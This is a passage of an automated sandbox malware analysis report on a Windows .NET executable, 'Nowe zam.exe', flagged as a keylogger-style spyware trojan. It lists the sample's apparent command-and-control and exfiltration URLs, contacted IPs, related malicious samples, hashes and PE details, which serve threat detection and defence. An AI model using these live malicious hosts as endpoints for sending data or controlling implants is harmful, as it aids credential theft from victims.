http://varders.kozow.com:8081	Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/173.254.250.79$	MSBuild.exe, 00000004.00000002.4773046764.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C9C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	MSBuild.exe, 00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	MSBuild.exe, 00000004.00000002.4773046764.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C72000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.tlakovec.si	MSBuild.exe, 00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Nowe zam.exe, 00000000.00000002.2344204160.0000000002840000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002C72000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
212.44.112.138	mail.tlakovec.si	Slovenia	43128	DHH-ASSI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1551046
Start date and time:	2024-11-07 12:48:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Nowe zam.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@6/5@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 245 Number of non-executed functions: 22
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.109.210.53, 199.232.214.172, 192.229.221.95, 40.69.42.241, 52.165.164.15
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Nowe zam.exe

Simulations

Behavior and APIs

Time	Type	Description
06:49:06	API Interceptor	1x Sleep call for process: Nowe zam.exe modified
06:49:07	API Interceptor	8x Sleep call for process: powershell.exe modified
06:49:09	API Interceptor	11377628x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Ce3CNfP8N6.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	KNARH81GDR5261301.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	FmmYUD4pt7.wsf	Get hash	malicious	Unknown	Browse
	05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	x6BqJ693rc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	doc20247622056002_pentamix.bat	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	5gz6ZZRQWh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	46roqD3HEE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	iENcsTur6E.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
188.114.96.3	Aviso de pago.xla.xlsx	Get hash	malicious	HTMLPhisher	Browse	paste.ee/d/PAg0l
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/8shpYIj5/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/CXujY04Y/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/O2nyeCCn/download
	2rI5YEg7uo.exe	Get hash	malicious	FormBook	Browse	www.evoolixyppuk.shop/7gfa/?pP=OC/NqFuXSoQKcxJzIwbC8gc6YWk63HA88JkIsR5MBtbsuoT1qNc3mE+usci2f4e+0fIXV/Px1LgbGc4SbpFIftMOxDoszWQURSPAVqq521dqxxqHUw==&UJO=A6MH4FUp
	createdbestthingswithgoodnewswithgreatfriendship.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse	paste.ee/d/PAg0l
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/O7tfWEfj/download
	NIlfETZ9aE.exe	Get hash	malicious	FormBook	Browse	www.timizoasisey.shop/agaq/
	https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.com	Get hash	malicious	HTMLPhisher	Browse	uniteseoul.com/
	ffsBbRe8UN.exe	Get hash	malicious	FormBook	Browse	www.serverplay.live/sp1b/
158.101.44.242	Fiyat teklifi iste#U011fi.bat.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	x6BqJ693rc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	46roqD3HEE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	46roqD3HEE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	iENcsTur6E.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	2tKeEoCCCw.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	Offer-7839373637-8839373-Quote8992832.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	NOAH $$$$.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	1730880308a25cd41259538643a6a02b355f33de1f56cb7e6d874f22aad09eac2596439da1840.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Ce3CNfP8N6.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	KNARH81GDR5261301.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Fiyat teklifi iste#U011fi.bat.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Fiyat teklifi iste#U011fi.bat.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	PO#I-24-0000217.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
api.telegram.org	Ce3CNfP8N6.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	KNARH81GDR5261301.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FmmYUD4pt7.wsf	Get hash	malicious	Unknown	Browse	149.154.167.220
	05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	x6BqJ693rc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	doc20247622056002_pentamix.bat	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	5gz6ZZRQWh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	iENcsTur6E.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
bg.microsoft.map.fastly.net	IEPSmartIS.Production.msi	Get hash	malicious	Unknown	Browse	199.232.210.172
	IEPSmartIS.Production.msi	Get hash	malicious	Unknown	Browse	199.232.214.172
	SecuriteInfo.com.Variant.Symmi.42162.17217.532.dll	Get hash	malicious	Numando	Browse	199.232.214.172
	VDsZYqbfHI.exe	Get hash	malicious	ScreenConnect Tool	Browse	199.232.210.172
	iB0IycHNEN.exe	Get hash	malicious	ScreenConnect Tool	Browse	199.232.214.172
	https://E.vg/FoedcaVhT	Get hash	malicious	Unknown	Browse	199.232.214.172
	nl698mrFYA.exe	Get hash	malicious	Stealc	Browse	199.232.210.172
	https://gabrielcoste.vercel.app/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://nfetgz.hascl.co.uk/YvkFcBQO	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://nfetgz.hascl.co.uk/YvkFcBQO	Get hash	malicious	Unknown	Browse	199.232.210.172
mail.tlakovec.si	ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	212.44.112.138

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Ce3CNfP8N6.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	KNARH81GDR5261301.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://berg.bergssrom.mom/fer.to.php.html	Get hash	malicious	Unknown	Browse	149.154.170.96
	FmmYUD4pt7.wsf	Get hash	malicious	Unknown	Browse	149.154.167.220
	05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	x6BqJ693rc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	doc20247622056002_pentamix.bat	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	5gz6ZZRQWh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	46roqD3HEE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	Ce3CNfP8N6.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	https://sendspace.com/pro/z42su8	Get hash	malicious	Mamba2FA	Browse	172.67.170.105
	C2jr42FUsv.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.133.135
	KNARH81GDR5261301.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	https://E.vg/FoedcaVhT	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://worldpay.merchant-dispute.com/	Get hash	malicious	Unknown	Browse	162.247.243.39
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.133.135
ORACLE-BMC-31898US	Ce3CNfP8N6.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	KNARH81GDR5261301.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Fiyat teklifi iste#U011fi.bat.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	x6BqJ693rc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	vHXObqOSGu.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	z349dth1eOtMzxuuRN.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
DHH-ASSI	ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	212.44.112.138
	SMBKT-20242005.exe	Get hash	malicious	AgentTesla	Browse	212.44.102.65
	a5hbkmGD7N.exe	Get hash	malicious	Pushdo	Browse	212.44.102.75
	G7DyaA9iz9.exe	Get hash	malicious	Pushdo	Browse	212.44.102.75
	x607DB0i08.exe	Get hash	malicious	Pushdo	Browse	212.44.102.75
	x7RlIzQDk1.exe	Get hash	malicious	Unknown	Browse	212.44.102.75
	EwK95WVtzI.exe	Get hash	malicious	Pushdo	Browse	212.44.102.75
	OWd39WUX3D.exe	Get hash	malicious	Pushdo	Browse	212.44.102.75
	demand_rpkb_060923.exe	Get hash	malicious	GuLoader	Browse	212.44.101.105
	CX17SY6xF6.exe	Get hash	malicious	Pushdo	Browse	212.44.102.57

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Ce3CNfP8N6.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	KNARH81GDR5261301.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Fiyat teklifi iste#U011fi.bat.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Fiyat teklifi iste#U011fi.bat.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	PO#I-24-0000217.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	05.11.241591883_UyeIsyeriCalismanKosullari.xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	Ce3CNfP8N6.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://sendspace.com/pro/z42su8	Get hash	malicious	Mamba2FA	Browse	149.154.167.220
	C2jr42FUsv.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	149.154.167.220
	List Furniture.bat	Get hash	malicious	Python Stealer, Braodo	Browse	149.154.167.220
	BB.bat	Get hash	malicious	Braodo	Browse	149.154.167.220
	KNARH81GDR5261301.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	getup.ps1	Get hash	malicious	LummaC	Browse	149.154.167.220
	New_Order_PO_GM5637H93.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine, XWorm	Browse	149.154.167.220
	Nvojocm.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.3601602641425945
Encrypted:	false
SSDEEP:	24:3CytZWSeUo4KmBs4RPT6BmFoUebDomjKcmZ9t7J0gt/NKIl9r6dj:yyjWSeR4y4RQmFoUe4mfmZ9tK8NDE
MD5:	0EE55C0A89EE908D4FA304C9EB8875B9
SHA1:	BABE64A045CFA48411038982F7926C0DB75F24D5
SHA-256:	D6838F36001F4FF9513A804BAA5EC824C9D9F68FA0FBFA11F00FB4D71EDDD6F5
SHA-512:	65E319DC8D39A35E8B11CCD24891BE9CB07CF0A1DB3286AC7666CC1563BBB5E6C4BE873C211D01652FCEA076497E53E51EB5636AE37C99F4F5D751FE9C25C080
Malicious:	false
Reputation:	low
Preview:	@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4..................~..2K..}...0........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2q10ipq.soi.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtgxzhqj.csq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xgo1nvf3.pt1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhxw5dl1.dkv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.970917263545694
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Nowe zam.exe
File size:	878'080 bytes
MD5:	d29c5fb95585ed107d8473d204d520ae
SHA1:	4a008ac6426aa63e7fbb7ce25810342efaeb6607
SHA256:	5a8467ab773f458f57d5942d6fe612c5048c50b19e7d63c82ff1eac99a324e2b
SHA512:	e8091d7c0bffeafe9642e55db9520475db1c3a6a6355a8e10f20971af036cdd94e9c1067b75bccc4ccd542b361839fa27bf743e103ba3c08495fbebc4ca149cc
SSDEEP:	12288:i1je1F7Y7dLYe5/OMM8kWXoCfKMbe7Tp4LB3GGlpFDVxhMFWYwZf:i1K1FidR/OMZ3dbspaB3GGlppndZ
TLSH:	FB1523F621221B17C95207B063204E8C82BD736D37A7CD8C9495AB4E7E93F8D679D853
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,g..............0..B...".......`... ........@.. ....................................@................................

File Icon


Icon Hash:	13256c6c6c6c6cec

Static PE Info

General

Entrypoint:	0x4d6006
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x672C9786 [Thu Nov 7 10:33:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
